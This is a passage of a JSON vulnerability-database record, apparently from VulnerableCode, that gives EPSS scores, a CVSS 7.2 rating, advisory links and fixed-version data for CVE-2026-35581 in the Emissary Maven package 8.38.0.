"0.18398", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18402", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18451", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00077", "scoring_system": "epss", "scoring_elements": "0.22992", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00077", "scoring_system": "epss", "scoring_elements": "0.23005", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24965", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24993", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24802", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24727", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24892", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24848", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24903", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26218", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26192", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26118", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26136", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35581" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1290", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1290" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-08T14:57:38Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35581", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35581" }, { "reference_url": "https://github.com/advisories/GHSA-6c37-7w4p-jg9v", "reference_id": "GHSA-6c37-7w4p-jg9v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6c37-7w4p-jg9v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35581", "GHSA-6c37-7w4p-jg9v" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vst1-rzvp-9bec" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.38.0" }